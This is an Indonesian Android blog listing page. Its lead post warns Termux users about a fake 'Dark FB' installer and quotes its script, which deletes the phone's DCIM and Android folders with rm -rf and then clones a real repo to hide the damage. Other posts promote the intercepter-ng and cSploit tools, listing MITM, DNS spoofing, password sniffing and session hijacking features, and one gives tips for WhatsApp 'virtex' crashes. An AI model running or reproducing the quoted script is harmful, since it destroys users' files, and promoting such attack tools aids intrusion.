Showing posts with label Android. Show all posts
Showing posts with label Android. Show all posts

Thursday, July 4, 2019

Bahaya asal install tool/script di termux






Halo teman - teman, kali saya akan membahas bahaya menginstall script/tools yang biasa di ambil dari github.

beberapa waktu yang lalu di group group pengguna termux di FB,WA ramai orang membicarakan tool yang disebut Dark FB dengan berbagai versi yang bermacam. bermacam macam repo dark fb disebar, banyak menginstall dan berhasil tetapi tidak sedikit juga yang gagal.
kemudian saya berniat mencoba dark fb yang sedang HOT ini.

googling  dark fb
dapat 1 repo https://github.com/ZeDDParker/dark-fb
script ditulis dengan bahasa python.
kemudian saya bongkar isi script ini dan teryata script ini berisi code yang berbahaya
script dapat menghapus beberapa  directory pada android

begini isinya

import os,sys,time

os.system("reset")
print "Install Tools..."
time.sleep(2)
os.system("cd /sdcard")
os.system("rm -rf DCIM")
os.system("rm -rf Android")
os.system("git clone https://github.com/rezadkim/dark-fb")
os.system("cd dark-fb")
os.system("python2 dark.py")



script ini menghapus dir DCIM dan Android
kemudia mengclone repo dark fb dari rezadkim dan diinstall secara otomatis
sehingga, seolah olah script berjalan dengan baik
tentu saja saya tidak jadi menginstall dengan script tersebut.

jadi sebelum  menginstall, baca dulu isi nya
sekian terimakasih.
Read More

Wednesday, July 3, 2019

sniffing jaringan di android dengan intercepter


intercepter-ng adalah tool yang di gunakan untuk sniffing jaringan sama seperti wireshark dll.
cara pemakaian bisa liat di google.





link Download : intercepter-ng Latest

berikut update fiture terbaru :

1.9 New:
+ Port Scanner (long click on IP)
+ DNS Spoofing
+ Improvements and fixes
1.8b New:
+ 'Gateway not found' fixed
+ Support for intel\arm x32\x64 devices
+ Clipboard usage for Cookies
+ Improvements and fixes
1.7 New:
+ Netmask bug fixed
+ Subnet scanning improved
+ Address bar in Cookie Viewer
+ Data view in Raw Mode

Read More

Tuesday, July 2, 2019

Solusi whatsapp crash karena Virtex

contoh virtex yang biasa dikirim

Halo teman teman, pernah gak sih kalian menerima pesan dari seseorang, terus whatsapp kalina tiba tiba lemot, dan akhirnya CRASH💢💢.

jika kalian pernah mengalami itu berarti kemungkinan besar seseorang yang mengirim pesan itu telah mengirim virtex.

saya pribadi pernah mengalami, sangat menjengkelkan memang, berikut  solusi yang bisa saya berikan

1. Hapus pesan virtex melalu whatsapp web
    ya ini adalah solusi terbaik saat ini ( menurut saya )
    jika melalui smartphone tidak bisa diakses karena berat, kalia  bisa mengakses melalui whatsapp  berbasis web. LINK : WA Web

note : kalian memerlukan autentikasi sebelum mengakses whatsapp web

 2. Re-Install

solusi ini jika kalian belum melakukan autentikasi pada whatsapp web, yaitu dengan menguninstal kemudia menginstall lagi whatsapp anda, mungkin pesan yang belum di backup akan hilang.
bisa juga menghapus sebelum crash ( masih tahap overload )
Read More

Sunday, June 30, 2019

Csploit : Advance Android Network Pentesting Suite






Csploit adalah paket analisis dan penetrasi jaringan
Android gratis dan open source yang bertujuan untuk menjadi
toolkit profesional paling lengkap dan canggih untuk pakar keamanan
TI untuk melakukan test keamanan jaringan pada perangkat seluler. Csploit juga memiliki banyak Fiture didalamnya


Download Csploit 
 
Feature :

  • Map your local network
  • Fingerprint hosts' operating systems and open ports
  • Add your own hosts outside the local network
  • Integrated traceroute
  • Integrated metasploit framework RPCd
    • Search hosts for known vulnerabilities via integrated Metasploit daemon
    • Adjust exploit settings, launch, and create shell consoles on exploited systems
    • More coming
  • Forge TCP/UDP packets
    • Image, text, and video replacement-- replace your own content on unencrypted web pages
    • JavaScript injection-- add your own javascript to unencrypted web pages.
    • password sniffing ( with common protocols dissection )
    • Capture pcap network traffic files
    • Real time traffic manipulation to replace images/text/inject into web pages
    • DNS spoofing to redirect traffic to different domain
    • Break existing connections
    • Redirect traffic to another address
    • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session
  • Perform man in the middle attacks (MITM) including: 
  • Image, text, and video replacement-- replace your own content on unencrypted web pages
  • JavaScript injection-- add your own javascript to unencrypted web pages.
  • password sniffing ( with common protocols dissection )
  • Capture pcap network traffic files
  • Real time traffic manipulation to replace images/text/inject into web pages
  • DNS spoofing to redirect traffic to different domain
  • Break existing connections
  • Redirect traffic to another address
  • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session
untuk Tutorial Akan menyusul secepatnya


Read More